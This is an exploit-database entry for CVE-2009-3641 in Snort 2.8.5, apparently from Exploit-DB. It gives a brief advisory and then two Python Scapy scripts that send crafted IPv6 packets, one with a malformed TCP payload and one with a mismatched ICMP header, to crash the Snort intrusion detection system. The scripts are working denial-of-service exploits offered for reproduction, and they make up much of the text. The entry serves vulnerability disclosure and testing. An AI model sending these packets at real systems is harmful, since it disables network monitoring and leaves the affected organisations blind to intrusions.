[] NeoSense

Snort 2.8.5 - Multiple Denial of Service Vulnerabilities

Author: laurent gaffie
type: dos
platform: linux
port: 
date_added: 2009-10-22 
date_updated: 2014-05-12 
verified: 1 
codes: CVE-2009-3641;OSVDB-59159 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/36795/info

Snort is prone to multiple denial-of-service vulnerabilities because the application fails to properly process specially crafted IPv6 packets.

Attackers can exploit these issues to crash the affected application, causing denial-of-service conditions.

These issues affect Snort 2.8.5; other versions may also be vulnerable.

You can reproduce theses two differents bugs easily by using the Python low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)

1) #only works on x86

#/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP

2) # works x86,x64

#/usr/bin/env python
from scapy.all import *

z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6)